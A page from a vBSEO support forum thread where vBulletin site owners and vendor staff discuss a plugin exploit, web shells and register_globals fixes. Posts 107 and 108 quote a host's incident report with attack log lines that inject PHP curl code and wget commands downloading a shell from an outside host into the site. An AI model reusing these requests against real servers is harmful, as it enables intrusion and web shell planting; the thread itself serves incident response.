Page 8 of 9 FirstFirst 1 2 3 4 5 6 7 8 9 LastLast
Results 106 to 120 of 129
Like Tree41Likes

FAQ's on the Rogue Plugins Exploit (1/23 vBSEO Patch Release)

This is a discussion on FAQ's on the Rogue Plugins Exploit (1/23 vBSEO Patch Release) within the vBSEO Announcements forums, part of the Announcements & Pre-Sales category; file2store.info redirect is not a vBSEO issue. Disabling/Enabling , reimporting product file only refreshes datastore which refreshes datastore. Forums that ...

  1. #106
    vBSEO.com Webmaster Array Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    23,463
    Liked
    721 times
    Blog Entries
    4
    file2store.info redirect is not a vBSEO issue. Disabling/Enabling , reimporting product file only refreshes datastore which refreshes datastore.
    Forums that don't run vBSEO are also facing similar issues. You may want to examine following threads


    You basically need to protect all folders on your site that has chmod 777 values


    http://www.vbseo.com/f77/google-redi...tml#post315178
    https://www.vbulletin.com/forum/show...=1#post2198971
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

  2. #107
    Junior Member Array
    Real Name
    tommydamic68
    Join Date
    Apr 2010
    Posts
    24
    Liked
    0 times
    I have reported this issue to my host, here is what they replied back with-please let me know if this makes any sense or if i am on the right track.


    Hello,

    We have found additional web shells running on your account. We noticed these were used to add malicious content to your account.

    For security purposes, the cPanel password for ********* has been reset to ***********

    We have taken action to remove these scripts.

    /*****/*****/*****/vbseo_sitemap/vbseo_logs.php
    /*****/*****/******/network.php

    The older of these shells has a time stamp that coordinates with log files showing upload through another script which was removed from the account.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    File: /****/*****/*****/network.php
    Modify: Sun, 21 Mar 2010 17:11:43 -0500 (1269209503)
    Change: Mon, 02 Apr 2012 01:50:11 -0500 (1333349411)

    /******/*****/logs/*******.com-Apr-2012.gz: 67.18.77.116 - - [02/Apr/2012:01:50:11 -0500] "POST /cron______.php HTTP/1.1" 200 6731 "http://www.********.com/cron______.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    I traced the log files back through the server using this IP to see that the vbseocp.php script was the source of the compromise.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    67.18.77.116 - - [02/Apr/2012:01:43:10 -0500] "POST /vbseocp.php HTTP/1.1" 200 134173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:46:47 -0500] "POST /vbseocp.php?p=$ch%20=%20curl_init($_REQUEST[rShell]);$fp%20=%20fopen($_REQUEST[lShell],%20$_REQUEST[mode]);curl_setopt($ch,%20CURLOPT_FILE,%20$fp);curl_set opt($ch,%20CURLOPT_HEADER,%
    200);curl_exec($ch);curl_close($ch);fclose($fp);&m ode=w&rShell=http://dl.com.my/s.txt&lShell=cron___.php HTTP/1.1" 403 933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.3
    0729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:46:56 -0500] "POST /vbseocp.php?p=$ch%20=%20curl_init($_REQUEST[rShell]);$fp%20=%20fopen($_REQUEST[lShell],%20$_REQUEST[mode]);curl_setopt($ch,%20CURLOPT_FILE,%20$fp);curl_set opt($ch,%20CURLOPT_HEADER,%
    200);curl_exec($ch);curl_close($ch);fclose($fp);&m ode=w&rShell=http://dl.com.my/s.txt&lShell=cron___.php HTTP/1.1" 403 933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.3
    0729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:47:38 -0500] "POST /vbseocp.php?d=id HTTP/1.1" 200 1313 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:47:51 -0500] "POST /vbseocp.php?d=ls%20-al HTTP/1.1" 200 31387 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:48:39 -0500] "POST /vbseocp.php?d=wget%20dl.com.my/s.txt%20-O%20cron______.php HTTP/1.1" 200 913 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CL
    R 3.5.30729; .NET4.0C)"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  3. #108
    vBSEO.com Webmaster Array Mert Gökçeimam's Avatar
    Real Name
    Lizard King
    Join Date
    Oct 2005
    Location
    Istanbul, Turkey, Turkey
    Posts
    23,463
    Liked
    721 times
    Blog Entries
    4
    Quote Originally Posted by tommydamic68 View Post
    I have reported this issue to my host, here is what they replied back with-please let me know if this makes any sense or if i am on the right track.


    Hello,

    We have found additional web shells running on your account. We noticed these were used to add malicious content to your account.

    For security purposes, the cPanel password for ********* has been reset to ***********

    We have taken action to remove these scripts.

    /*****/*****/*****/vbseo_sitemap/vbseo_logs.php
    /*****/*****/******/network.php

    The older of these shells has a time stamp that coordinates with log files showing upload through another script which was removed from the account.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    File: /****/*****/*****/network.php
    Modify: Sun, 21 Mar 2010 17:11:43 -0500 (1269209503)
    Change: Mon, 02 Apr 2012 01:50:11 -0500 (1333349411)

    /******/*****/logs/*******.com-Apr-2012.gz: 67.18.77.116 - - [02/Apr/2012:01:50:11 -0500] "POST /cron______.php HTTP/1.1" 200 6731 "http://www.********.com/cron______.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    I traced the log files back through the server using this IP to see that the vbseocp.php script was the source of the compromise.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    67.18.77.116 - - [02/Apr/2012:01:43:10 -0500] "POST /vbseocp.php HTTP/1.1" 200 134173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:46:47 -0500] "POST /vbseocp.php?p=$ch%20=%20curl_init($_REQUEST[rShell]);$fp%20=%20fopen($_REQUEST[lShell],%20$_REQUEST[mode]);curl_setopt($ch,%20CURLOPT_FILE,%20$fp);curl_set opt($ch,%20CURLOPT_HEADER,%
    200);curl_exec($ch);curl_close($ch);fclose($fp);&m ode=w&rShell=http://dl.com.my/s.txt&lShell=cron___.php HTTP/1.1" 403 933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.3
    0729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:46:56 -0500] "POST /vbseocp.php?p=$ch%20=%20curl_init($_REQUEST[rShell]);$fp%20=%20fopen($_REQUEST[lShell],%20$_REQUEST[mode]);curl_setopt($ch,%20CURLOPT_FILE,%20$fp);curl_set opt($ch,%20CURLOPT_HEADER,%
    200);curl_exec($ch);curl_close($ch);fclose($fp);&m ode=w&rShell=http://dl.com.my/s.txt&lShell=cron___.php HTTP/1.1" 403 933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.3
    0729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:47:38 -0500] "POST /vbseocp.php?d=id HTTP/1.1" 200 1313 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:47:51 -0500] "POST /vbseocp.php?d=ls%20-al HTTP/1.1" 200 31387 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CLR 3.5.30729; .NET4.0C)"
    67.18.77.116 - - [02/Apr/2012:01:48:39 -0500] "POST /vbseocp.php?d=wget%20dl.com.my/s.txt%20-O%20cron______.php HTTP/1.1" 200 913 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET CL
    R 3.5.30729; .NET4.0C)"
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Please don't flood all around with your messages. Try sticking on one thread so you can receive further assistance.
    Mert Gökçeimam / Crawlability Inc.

    vBSEO 3.6.0 Alpha Önizlemesi - Including Like Tree
    Unveiling the NEW vBSEO Sitemap Generator 3.0 - available NOW for vBSEO Customers!


    Twitter:@Depkac
    Personal Blog : Mert Gökçeimam

  4. #109
    Senior Member Array I, Brian's Avatar
    Join Date
    Sep 2005
    Location
    Scotland
    Posts
    132
    Liked
    1 times
    This is happening again to me.

  5. #110
    Senior Member Array
    Real Name
    djbaxter
    Join Date
    Mar 2009
    Posts
    644
    Liked
    79 times

  6. #111
    Junior Member Array
    Real Name
    Simon Young
    Join Date
    Sep 2006
    Posts
    6
    Liked
    0 times
    I received the hacked message yesterday and my site then had the malware message plastered onto it, personally I think its a bloody cheek that Google has the right to block your site and display a 'compromised / malware warning' because as soon as they do that it doesnt matter which other search engine you then use you still get bad messages and all your traffic dissapears overnight. There should definately be a grace period of at least a few hours to get things sorted.

    I'm lucky that I am competent enough to remove the code and malicious scripts and got myself reconsidered on Google within 10 hours... however I am still not convinced that everthing is hunky dory in the vbseo world and aprehensive at reactivating the vbseo software - I have upgraded to 4.2 on vbulletin and uploaded all the new files for vbseo but not turned the plugin back on yet, I have run the checks suggested at the start of this thread - AM I SAFE TO SWITCH IT BACK ON DO YOU THINK??
    Simon Young
    Senior Partner
    http://www.talkangling.co.uk

  7. #112
    Senior Member Array
    Real Name
    Steven Taylor
    Join Date
    Jun 2007
    Posts
    128
    Liked
    3 times
    We keep seeing this daily. Is it normal?

    Checking datastore pluginslist: DETECTED: eval(CHR [Click here to reset datastore]

  8. #113
    Senior Member Array
    Real Name
    TopAs
    Join Date
    Jul 2005
    Location
    Isernhagen near Hannover Germany
    Posts
    198
    Liked
    3 times
    Quote Originally Posted by stevectaylor View Post
    We keep seeing this daily. Is it normal?
    No - this is not normal. There is an active security leak in the latest VBSEO Plugin - we found out how the code is inserted. But Crawlability doesn´t seem to be interested in a solution. They don´t care about it for 5 month !

  9. #114
    Member Array
    Real Name
    Diego
    Join Date
    Oct 2009
    Posts
    54
    Liked
    7 times
    TopAs but you didn't contact with Andrés yesterday with a posible solution?

  10. #115
    Senior Member Array
    Real Name
    Steven Taylor
    Join Date
    Jun 2007
    Posts
    128
    Liked
    3 times
    Well I am lost in all this. Going to remove VBSEO on one of our and see if that resolves it.

  11. #116
    vBSEO Staff Array Andrés Durán Hewitt's Avatar
    Real Name
    Andrés Durán
    Join Date
    Jul 2009
    Location
    Costa Rica
    Posts
    3,858
    Liked
    566 times
    Blog Entries
    2
    Hi Steven,

    Upon detailed investigations performed by our development team, we've found out that "register_globals" PHP directive seems to be the most common cause of the issue.

    Please see for details: http://www.vbseo.com/f3/hacked-url12...tml#post332787

    Can you give it a try prior removing vBSEO?
    Andrés Durán / Crawlability Inc.
    ˇvBSEO 3.6.0 GOLD Liberado!
    Inaugurando el NUEVO vBSEO Sitemap Generator 3.0. - ˇAHORA disponible para Clientes de vBSEO!

    Síguenos en: Facebook | Síguenos en: Twitter


  12. #117
    Senior Member Array
    Real Name
    Steven Taylor
    Join Date
    Jun 2007
    Posts
    128
    Liked
    3 times
    done. Lets see. I will let you know.

  13. #118
    Member Array
    Real Name
    travis
    Join Date
    Sep 2007
    Posts
    38
    Liked
    0 times
    Quote Originally Posted by Andrés Durán Hewitt View Post
    Hi Steven, Upon detailed investigations performed by our development team, we've found out that "register_globals" PHP directive seems to be the most common cause of the issue. Please see for details: http://www.vbseo.com/f3/hacked-url12...tml#post332787 Can you give it a try prior removing vBSEO?
    Is this done through the host, or can we do this on our end?

  14. #119
    Senior Member Array
    Real Name
    Steven Taylor
    Join Date
    Jun 2007
    Posts
    128
    Liked
    3 times
    Quote Originally Posted by toejam View Post
    Is this done through the host, or can we do this on our end?
    We changed it through CPanel in the PHPini option. I am sure you maybe able to use an .ini file

  15. #120
    Member Array
    Real Name
    travis
    Join Date
    Sep 2007
    Posts
    38
    Liked
    0 times
    I am not sure were to look in cpanel to do this. This wont effect anything?

Page 8 of 9 FirstFirst 1 2 3 4 5 6 7 8 9 LastLast

Similar Threads

  1. *vBSEO Security Bulletin* All Supported Versions: Patch Release
    By Brian Cummiskey in forum vBSEO Announcements
    Replies: 169
    Last Post: 01-30-2012, 02:01 AM
  2. vbSEO Security Patch Release
    By vBulletin.com Staff in forum vBulletin.com Announcements
    Replies: 1
    Last Post: 01-24-2012, 02:31 AM
  3. Replies: 4
    Last Post: 08-28-2010, 10:32 AM
  4. Security Patch Release 3.8.6 PL1
    By vBulletin.com Staff in forum vBulletin.com Announcements
    Replies: 3
    Last Post: 07-23-2010, 06:27 AM
  5. Security Patch Release 4.0.2 PL4
    By vBulletin.com Staff in forum vBulletin.com Announcements
    Replies: 0
    Last Post: 03-26-2010, 01:11 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •